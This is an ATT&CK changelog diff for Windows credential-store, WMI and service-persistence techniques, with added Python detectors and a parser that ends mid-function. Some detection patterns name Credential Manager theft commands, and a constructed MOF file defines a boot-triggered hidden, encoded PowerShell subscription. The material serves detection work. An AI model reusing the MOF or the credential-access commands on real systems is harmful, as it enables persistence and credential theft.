| external_references[1]['url'] | https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11)#credential-manager-store | https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/ |
| external_references[2]['source_name'] | Microsoft Credential Locker | Delpy Mimikatz Crendential Manager |
| external_references[2]['description'] | Microsoft. (2013, October 23). Credential Locker Overview. Retrieved November 24, 2020. | Delpy, B. (2017, December 12). howto ~ credential manager saved credentials. Retrieved November 23, 2020. |
| external_references[2]['url'] | https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/jj554668(v=ws.11)?redirectedfrom=MSDN | https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials |
| external_references[3]['source_name'] | passcape Windows Vault | Microsoft Credential Locker |
| external_references[3]['description'] | Passcape. (n.d.). Windows Password Recovery - Vault Explorer and Decoder. Retrieved November 24, 2020. | Microsoft. (2013, October 23). Credential Locker Overview. Retrieved November 24, 2020. |
| external_references[3]['url'] | https://www.passcape.com/windows_password_recovery_vault_explorer | https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/jj554668(v=ws.11)?redirectedfrom=MSDN |
| external_references[4]['source_name'] | Malwarebytes The Windows Vault | Microsoft Credential Manager store |
| external_references[4]['description'] | Arntz, P. (2016, March 30). The Windows Vault . Retrieved November 23, 2020. | Microsoft. (2016, August 31). Cached and Stored Credentials Technical Overview. Retrieved November 24, 2020. |
| external_references[4]['url'] | https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/ | https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11)#credential-manager-store |
| external_references[6]['source_name'] | Delpy Mimikatz Crendential Manager | passcape Windows Vault |
| external_references[6]['description'] | Delpy, B. (2017, December 12). howto ~ credential manager saved credentials. Retrieved November 23, 2020. | Passcape. (n.d.). Windows Password Recovery - Vault Explorer and Decoder. Retrieved November 24, 2020. |
| external_references[6]['url'] | https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials | https://www.passcape.com/windows_password_recovery_vault_explorer |
| x_mitre_data_sources[0] | Process: Process Creation | File: File Access |
| x_mitre_data_sources[1] | Command: Command Execution | Process: OS API Execution |
| x_mitre_data_sources[2] | Process: OS API Execution | Process: Process Creation |
| x_mitre_data_sources[3] | File: File Access | Command: Command Execution |
| x_mitre_version | 1.0 | 1.1 |
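The four data sources listed above (file access, OS API execution, process creation, command execution) map directly onto the access paths the description names: vaultcmd.exe /listcreds, reads of the .vcrd and Policy.vpol files under the Vault and Credentials folders, CredEnumerateA, and the rundll32 keymgr.dll,KRShowKeyMgr backup dialog. The following detector is an added example, not ATT&CK content or any vendor's rule; it runs over constructed, Sysmon-like event records whose field names, the placeholder vault GUID, and the small allowlist of expected locker readers are all assumptions to be mapped onto real telemetry.

```python
"""Flag Windows Credential Manager access in endpoint telemetry.

Added example; not ATT&CK content or any vendor's detection. The event
records are constructed in a simplified Sysmon/EDR-like shape, and the field
names ("type", "image", "command_line", "target", "api") are assumptions to
map onto your own schema. The reader allowlist is also an assumption.
"""
import re
from typing import Dict, List

# Locker locations from the technique description: encrypted .vcrd blobs and the
# Policy.vpol key file under %LOCALAPPDATA%\Microsoft\Vault\ or \Credentials\.
LOCKER_PATH = re.compile(r"\\AppData\\Local\\Microsoft\\(Vault|Credentials)\\", re.IGNORECASE)
LOCKER_FILE = re.compile(r"(\.vcrd|Policy\.vpol)$", re.IGNORECASE)

# Assumed: processes expected to touch locker files or call the Cred* APIs.
EXPECTED_READERS = {"lsass.exe", "svchost.exe"}
CRED_APIS = {"CredEnumerateA", "CredEnumerateW", "CredReadA", "CredReadW"}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return finding tags for one event; an empty list means nothing to report."""
    tags: List[str] = []
    kind = event.get("type")
    image = _basename(event.get("image", ""))
    cmd = event.get("command_line", "").lower()

    if kind == "process_create":
        # vaultcmd /listcreds:"<locker>" [/all] enumerates a Credential Locker.
        if image == "vaultcmd.exe" and "/listcreds" in cmd:
            tags.append("vaultcmd_listcreds")
        # rundll32 keymgr.dll,KRShowKeyMgr opens the "Stored User Names and
        # Passwords" dialog used for credential backup and restore.
        if image == "rundll32.exe" and "keymgr.dll" in cmd and "krshowkeymgr" in cmd:
            tags.append("keymgr_backup_ui")
    elif kind == "file_access":
        target = event.get("target", "")
        if LOCKER_PATH.search(target) and LOCKER_FILE.search(target) and image not in EXPECTED_READERS:
            tags.append("locker_file_read_by_unexpected_process")
    elif kind == "api_call":
        if event.get("api") in CRED_APIS and image not in EXPECTED_READERS:
            tags.append("cred_api_enumeration")
    return tags


def hunt(events):
    """Return (index, tags) for every event that produced at least one tag."""
    out = []
    for i, ev in enumerate(events):
        tags = classify(ev)
        if tags:
            out.append((i, tags))
    return out


# Constructed sample telemetry; the GUID folder name is a placeholder.
VAULT = r"C:\Users\alice\AppData\Local\Microsoft\Vault\11111111-2222-3333-4444-555555555555"
SAMPLE_EVENTS = [
    {"type": "process_create", "image": r"C:\Windows\System32\vaultcmd.exe",
     "command_line": 'vaultcmd /listcreds:"Windows Credentials" /all'},
    {"type": "process_create", "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": "rundll32.exe keymgr.dll,KRShowKeyMgr"},
    {"type": "file_access", "image": r"C:\Users\alice\Downloads\dump.exe", "target": VAULT + r"\Policy.vpol"},
    {"type": "file_access", "image": r"C:\Windows\System32\lsass.exe", "target": VAULT + r"\Policy.vpol"},
    {"type": "api_call", "image": r"C:\Users\alice\Downloads\dump.exe", "api": "CredEnumerateA"},
    {"type": "process_create", "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe"},
]

if __name__ == "__main__":
    for idx, tags in hunt(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["image"], tags)
```

The allowlist is the tuning knob: locker files and the Cred* APIs are read legitimately by the Credential Manager service itself, so the signal is the reading process, not the read.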
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Uriel Kosayev | |
| x_mitre_contributors | Vadim Khrykov |
| Old Description | New Description |
|---|---|
| Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM). (Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS. (Citation: MSDN WMI) (Citation: FireEye WMI 2015) An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) | Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. 
The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015) An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 23:58:07.715000+00:00 | 2022-04-20 16:25:21.348000+00:00 |
| description | Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM). (Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS. (Citation: MSDN WMI) (Citation: FireEye WMI 2015) An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) | Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. 
The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015) An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) |
| external_references[1]['source_name'] | MSDN WMI | FireEye WMI 2015 |
| external_references[1]['description'] | Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016. | Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. |
| external_references[1]['url'] | https://msdn.microsoft.com/en-us/library/aa394582.aspx | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf |
| external_references[2]['source_name'] | FireEye WMI 2015 | FireEye WMI SANS 2015 |
| external_references[2]['description'] | Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. | Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020. |
| external_references[2]['url'] | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf | https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf |
| external_references[3]['source_name'] | FireEye WMI SANS 2015 | MSDN WMI |
| external_references[3]['description'] | Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020. | Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016. |
| external_references[3]['url'] | https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf | https://msdn.microsoft.com/en-us/library/aa394582.aspx |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| Old Description | New Description |
|---|---|
| Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user login, or the computer's uptime. (Citation: Mandiant M-Trends 2015) Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018) WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. | Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. 
Examples of events that may be subscribed to are the wall clock time, user login, or the computer's uptime.(Citation: Mandiant M-Trends 2015) Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018) WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 20:11:13.719000+00:00 | 2022-04-20 17:01:37.760000+00:00 |
| description | Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user login, or the computer's uptime. (Citation: Mandiant M-Trends 2015) Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018) WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. | Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. 
Examples of events that may be subscribed to are the wall clock time, user login, or the computer's uptime.(Citation: Mandiant M-Trends 2015) Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018) WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. |
| external_references[1]['source_name'] | Mandiant M-Trends 2015 | FireEye WMI 2015 |
| external_references[1]['description'] | Mandiant. (2015, February 24). M-Trends 2015: A View from the Front Lines. Retrieved May 18, 2016. | Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. |
| external_references[1]['url'] | https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf |
| external_references[2]['source_name'] | FireEye WMI SANS 2015 | Dell WMI Persistence |
| external_references[2]['description'] | Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020. | Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016, March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016. |
| external_references[2]['url'] | https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf | https://www.secureworks.com/blog/wmi-persistence |
| external_references[3]['source_name'] | FireEye WMI 2015 | FireEye WMI SANS 2015 |
| external_references[3]['description'] | Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. | Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020. |
| external_references[3]['url'] | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf | https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf |
| external_references[4]['source_name'] | Dell WMI Persistence | Medium Detecting WMI Persistence |
| external_references[4]['description'] | Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016, March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016. | French, D. (2018, October 9). Detecting & Removing an Attacker’s WMI Persistence. Retrieved October 11, 2019. |
| external_references[4]['url'] | https://www.secureworks.com/blog/wmi-persistence | https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96 |
| external_references[5]['source_name'] | Microsoft MOF May 2018 | Elastic - Hunting for Persistence Part 1 |
| external_references[5]['description'] | Satran, M. (2018, May 30). Managed Object Format (MOF). Retrieved January 24, 2020. | French, D., Murphy, B. (2020, March 24). Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1). Retrieved December 21, 2020. |
| external_references[5]['url'] | https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof- | https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1 |
| external_references[6]['source_name'] | TechNet Autoruns | Mandiant M-Trends 2015 |
| external_references[6]['description'] | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. | Mandiant. (2015, February 24). M-Trends 2015: A View from the Front Lines. Retrieved May 18, 2016. |
| external_references[6]['url'] | https://technet.microsoft.com/en-us/sysinternals/bb963902 | https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf |
| external_references[7]['source_name'] | Medium Detecting WMI Persistence | Microsoft Register-WmiEvent |
| external_references[7]['description'] | French, D. (2018, October 9). Detecting & Removing an Attacker’s WMI Persistence. Retrieved October 11, 2019. | Microsoft. (n.d.). Retrieved January 24, 2020. |
| external_references[7]['url'] | https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96 | https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1 |
| external_references[8]['source_name'] | Elastic - Hunting for Persistence Part 1 | TechNet Autoruns |
| external_references[8]['description'] | French, D., Murphy, B. (2020, March 24). Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1). Retrieved December 21, 2020. | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. |
| external_references[8]['url'] | https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1 | https://technet.microsoft.com/en-us/sysinternals/bb963902 |
| external_references[9]['source_name'] | Microsoft Register-WmiEvent | Microsoft MOF May 2018 |
| external_references[9]['description'] | Microsoft. (n.d.). Retrieved January 24, 2020. | Satran, M. (2018, May 30). Managed Object Format (MOF). Retrieved January 24, 2020. |
| external_references[9]['url'] | https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1 | https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof- |
| x_mitre_detection | Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence) Monitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding events. Event ID 5861 is logged on Windows 10 systems when new EventFilterToConsumerBinding events are created.(Citation: Elastic - Hunting for Persistence Part 1)
Monitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process). |
Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence.(Citation: TechNet Autoruns)(Citation: Medium Detecting WMI Persistence) Monitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding events. Event ID 5861 is logged on Windows 10 systems when new EventFilterToConsumerBinding events are created.(Citation: Elastic - Hunting for Persistence Part 1)
Monitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).(Citation: Microsoft Register-WmiEvent) |
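The description above explains that a WMI persistence mechanism is three objects joined together (an __EventFilter, an event consumer, and a __FilterToConsumerBinding), often delivered as a .mof file, and the detection text says to compare the resulting subscriptions against known-good ones. The parser below is an added example, not ATT&CK content or a vendor tool: it extracts the instances from MOF text, resolves each binding to its filter and consumer (by `$alias` or by object path), and reports bindings whose consumer executes code, whose payload looks like a script host, or whose filter fires on system uptime. The MOF text is constructed; the names, the uptime thresholds and the encoded payload are placeholders.

```python
"""Parse MOF text and review the WMI event subscriptions it would register.

Added example; not ATT&CK content or any vendor's tool. The MOF below is
constructed (names, query thresholds and payload are placeholders). Filter and
consumer references are resolved both by alias ($Name) and by object path.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

INSTANCE_RE = re.compile(
    r"instance\s+of\s+(?P<cls>\w+)(?:\s+as\s+\$(?P<alias>\w+))?\s*\{(?P<body>.*?)\}\s*;",
    re.DOTALL | re.IGNORECASE)
PROP_RE = re.compile(r'(?P<key>\w+)\s*=\s*(?P<val>"(?:[^"\\]|\\.)*"|\$\w+|[^;]+)\s*;', re.DOTALL)
PATH_RE = re.compile(r'(\w+)\.Name="([^"]+)"')

# Consumer classes that execute supplied code, and tokens typical of a payload.
CODE_CONSUMERS = {"commandlineeventconsumer", "activescripteventconsumer"}
SUSPICIOUS_TOKENS = ("powershell", "cmd.exe", "-enc", "wscript", "cscript", "mshta", "rundll32")


@dataclass
class MofInstance:
    cls: str
    alias: Optional[str]
    props: Dict[str, str]


def _unquote(raw: str) -> str:
    raw = raw.strip()
    if len(raw) >= 2 and raw[0] == raw[-1] == '"':
        return raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return raw


def parse_mof(text: str) -> List[MofInstance]:
    """Extract every `instance of <class> [as $alias] { key = value; ... };` block."""
    out = []
    for m in INSTANCE_RE.finditer(text):
        props = {p.group("key"): _unquote(p.group("val")) for p in PROP_RE.finditer(m.group("body"))}
        out.append(MofInstance(m.group("cls"), m.group("alias"), props))
    return out


def _resolve(ref: str, by_alias: dict, by_path: dict) -> Optional[MofInstance]:
    if ref.startswith("$"):
        return by_alias.get(ref[1:])
    m = PATH_RE.search(ref)
    return by_path.get((m.group(1).lower(), m.group(2).lower())) if m else None


def review_subscriptions(text: str) -> List[dict]:
    """Join each __FilterToConsumerBinding to its filter and consumer; report risky ones."""
    instances = parse_mof(text)
    by_alias = {i.alias: i for i in instances if i.alias}
    by_path = {(i.cls.lower(), i.props.get("Name", "").lower()): i for i in instances}
    findings = []
    for b in (i for i in instances if i.cls.lower() == "__filtertoconsumerbinding"):
        flt = _resolve(b.props.get("Filter", ""), by_alias, by_path)
        con = _resolve(b.props.get("Consumer", ""), by_alias, by_path)
        if flt is None or con is None:
            continue  # referenced object is not defined in this file
        payload = con.props.get("CommandLineTemplate") or con.props.get("ScriptText") or ""
        reasons = ["code-executing consumer class"] if con.cls.lower() in CODE_CONSUMERS else []
        reasons += [f"payload references {t}" for t in SUSPICIOUS_TOKENS if t in payload.lower()]
        if "systemuptime" in flt.props.get("Query", "").lower():
            reasons.append("uptime-triggered filter (fires shortly after boot)")
        if reasons:
            findings.append({"filter": flt.props.get("Name", ""), "consumer_class": con.cls,
                             "consumer": con.props.get("Name", ""), "payload": payload, "reasons": reasons})
    return findings


# Constructed MOF: one log-forwarding binding and one that launches hidden PowerShell after boot.
SAMPLE_MOF = r'''
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $LogFilt
{ Name = "Constructed Log Filter"; EventNamespace = "root\\cimv2"; QueryLanguage = "WQL";
  Query = "SELECT * FROM MSFT_SCMEventLogEvent"; };
instance of NTEventLogEventConsumer as $LogCons
{ Name = "Constructed Log Consumer"; SourceName = "Service Control Manager"; };
instance of __FilterToConsumerBinding
{ Filter = $LogFilt; Consumer = $LogCons; };
instance of __EventFilter
{ Name = "UpdaterFilter"; EventNamespace = "root\\cimv2"; QueryLanguage = "WQL";
  Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"; };
instance of CommandLineEventConsumer
{ Name = "UpdaterConsumer"; CommandLineTemplate = "powershell.exe -NoP -W Hidden -Enc QQBBAEEA"; };
instance of __FilterToConsumerBinding
{ Filter = "__EventFilter.Name=\"UpdaterFilter\""; Consumer = "CommandLineEventConsumer.Name=\"UpdaterConsumer\""; };
'''

if __name__ == "__main__":
    for f in review_subscriptions(SAMPLE_MOF):
        print(f"{f['filter']} -> {f['consumer_class']}:{f['consumer']}  {'; '.join(f['reasons'])}")
```

The same join logic applies to live data: dump the three classes from the root\subscription namespace (or parse the Event ID 5861 message, which carries the binding, filter and consumer in one record) and feed them through `review_subscriptions` after turning them into the same instance shape; the known-good comparison the detection text calls for is then a set difference on (filter name, consumer name) pairs per host.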
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| Old Description | New Description |
|---|---|
| Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). Adversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system. An adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used. Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). | Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. 
Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component). |
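The new description adds driver installation through services (a .sys dropped to disk and registered with CreateServiceW, the service Registry values, or PnPUtil.exe) and masquerading under a legitimate service name to the older points about sc.exe, Registry edits and SYSTEM-level execution. The reviewer below is an added example, not ATT&CK content or a vendor rule; it takes records shaped like the rendered fields of the System log's "A service was installed in the system" event (ServiceName, ImagePath, ServiceType, StartType, AccountName) plus raw command lines, all constructed here, and applies checks that follow from the description: kernel drivers whose image is outside System32\drivers, service binaries that are command or script hosts, images in user-writable folders, well-known service names pointing at an unexpected image, and sc.exe / pnputil.exe invocations that register a service or driver. The name-to-path allowlist is an assumption with two entries.

```python
"""Review Windows service installations for driver loading, script hosts and masquerading.

Added example; not ATT&CK content or any vendor's rule. The records mirror the
rendered fields of System log Event ID 7045 ("A service was installed in the
system") but are constructed, as are the allowlist and the command lines.
"""
from typing import Dict, List

USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\", "\\appdata\\")
DRIVER_DIR = "\\system32\\drivers\\"
SCRIPT_HOSTS = ("cmd.exe", "powershell", "rundll32", "regsvr32", "mshta", "wscript", "cscript")

# Assumed allowlist: well-known service names and a path fragment their image must contain.
EXPECTED_IMAGE = {"wuauserv": "\\system32\\svchost.exe", "spooler": "\\system32\\spoolsv.exe"}


def review_service_install(ev: Dict[str, str]) -> List[str]:
    """Return the reasons a new service or driver registration deserves a look."""
    name = ev["ServiceName"].lower()
    path = ev["ImagePath"].lower()
    reasons: List[str] = []
    if "kernel" in ev["ServiceType"].lower():
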